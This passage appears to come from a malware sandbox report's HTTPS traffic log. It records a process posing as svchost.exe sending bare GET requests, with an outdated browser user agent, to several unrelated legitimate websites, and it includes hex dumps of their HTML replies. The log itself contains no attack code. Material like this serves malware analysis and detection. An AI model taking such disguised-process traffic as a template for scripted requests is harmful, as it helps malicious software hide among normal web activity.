hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);
2023-03-22 04:45:07 UTC	650	IN	Data Raw: 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 6f 70 65 6e 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 45 66 66 65 63 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20 Data Ascii: 'none', //elastic, fade or none openSpeed : 250, closeEffect: 'none', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick
2023-03-22 04:45:07 UTC	652	IN	Data Raw: 72 65 66 49 44 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 22 6e 6f 6e 65 22 3b 09 0d 0a 7d 0d 0a 66 75 6e 63 74 69 6f 6e 20 68 69 64 65 73 74 75 66 66 28 62 6f 78 69 64 29 7b 0d 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72 Data Ascii: refID.style.display = "none";}function hidestuff(boxid){ document.getElementById(boxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a hr
2023-03-22 04:45:07 UTC	653	IN	Data Raw: 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d Data Ascii: ass="g-animatedblock "><div class="g-animatedblock-animated g-bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div class=
2023-03-22 04:45:07 UTC	654	IN	Data Raw: 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 34 2e 70 6e 67 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 Data Ascii: "><img src="/images/rocketlauncher/home/slideshow/img-04.png" alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-anima
2023-03-22 04:45:07 UTC	656	IN	Data Raw: 79 6f 5f 64 69 61 67 6e 6f 73 74 69 63 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 6f 72 74 61 66 6f 6c 69 6f 5f 68 6f 6d 65 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c Data Ascii: yo_diagnostico.jpg" alt=""><div class="g-promoimage-caption"><div class="g-promoimage-icon"></div><div class="g-promoimage-desc"><a class="portafolio_home" href="/index.php/somos-especialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> <
2023-03-22 04:45:07 UTC	657	IN	Data Raw: 69 c3 b3 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 Data Ascii: in</a></div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure class="g-promoimage-effect"><span class="g-promoimage
2023-03-22 04:45:07 UTC	658	IN	Data Raw: 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 66 65 61 74 75 72 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e Data Ascii: "g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-feature"><div class="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div>
2023-03-22 04:45:07 UTC	660	IN	Data Raw: 26 23 31 36 30 3b 70 72 6f 74 65 63 74 65 64 5d 3c 2f 61 3e 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 43 6f 6e 73 75 6c 74 61 20 45 78 74 65 72 6e 61 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 33 2d 20 4f 70 63 69 c3 b3 6e 20 31 20 63 69 74 61 20 64 65 20 6f 6e 63 6f 6c 6f 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 32 20 70 72 6f 67 72 61 6d 61 63 69 c3 b3 6e 20 64 65 20 63 69 72 75 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 33 20 6f 74 72 61 73 20 63 69 74 61 73 20 3c 62 72 3e 0a 48 6f 72 61 72 69 6f 20 64 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 Data Ascii:  protected]</a></br><br></br><strong>Citas Consulta Externa: <p>6076430023- Opcin 1 cita de oncologa- Opcin 2 programacin de ciruga- Opcin 3 otras citas <br>Horario de atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><b
2023-03-22 04:45:07 UTC	661	IN	Data Raw: 3e 44 69 72 65 63 63 69 c3 b3 6e 3c 2f 68 33 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 20 67 2d 63 6f 6e 74 61 63 74 2d 63 6f 6d 70 61 63 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 Data Ascii: >Direccin</h3><div class="g-contact g-contact-compact"><div class="g-contact-item"><div class="g-contact-label">Calle 48 # 25-56</div> <div class="g-contact-text">Calle 48 # 25-56</div> </div><div class="g-contact-item"><div class="g-contact-label"
2023-03-22 04:45:07 UTC	662	IN	Data Raw: 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 70 79 72 69 67 68 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 2d 32 34 34 34 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 22 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c Data Ascii: div></div></section></div></div></div></section><section id="g-copyright"><div class="g-container"> <div class="g-grid"><div class="g-block size-33-3"><div id="logo-2444-particle" class="g-content g-particle"> <a href="/" title="" rel="home" cl
2023-03-22 04:45:07 UTC	664	IN	Data Raw: 34 66 65 0d 0a 74 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 Data Ascii: 4fet"></span></a></div></div></div></div></div></section></div><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src="/media/gantry5/assets/js/main.js"></s
2023-03-22 04:45:07 UTC	665	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.5	62413	185.237.66.112	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:06 UTC	348	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: techtrans.de
2023-03-22 04:45:06 UTC	352	IN	HTTP/1.1 403 Forbidden Date: Wed, 22 Mar 2023 04:45:06 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: 0 X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-03-22 04:45:06 UTC	352	IN	Data Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.5	60568	185.237.66.112	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:06 UTC	350	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: techtrans.de
2023-03-22 04:45:06 UTC	353	IN	HTTP/1.1 403 Forbidden Date: Wed, 22 Mar 2023 04:45:06 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: 0 X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-03-22 04:45:06 UTC	353	IN	Data Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.5	62414	5.189.171.125	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:06 UTC	350	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: www.muhr-soehne.de
2023-03-22 04:45:06 UTC	354	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 04:45:06 GMT Server: Apache/2.4.38 (Debian) Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT Accept-Ranges: bytes Content-Length: 51841 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
2023-03-22 04:45:06 UTC	379	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20 Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
2023-03-22 04:45:06 UTC	395	IN	Data Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65 Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
2023-03-22 04:45:06 UTC	444	IN	Data Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
2023-03-22 04:45:06 UTC	460	IN	Data Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.5	62294	5.189.171.125	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:06 UTC	354	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: www.muhr-soehne.de
2023-03-22 04:45:06 UTC	411	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 04:45:06 GMT Server: Apache/2.4.38 (Debian) Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT Accept-Ranges: bytes Content-Length: 51841 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
2023-03-22 04:45:06 UTC	463	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20 Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
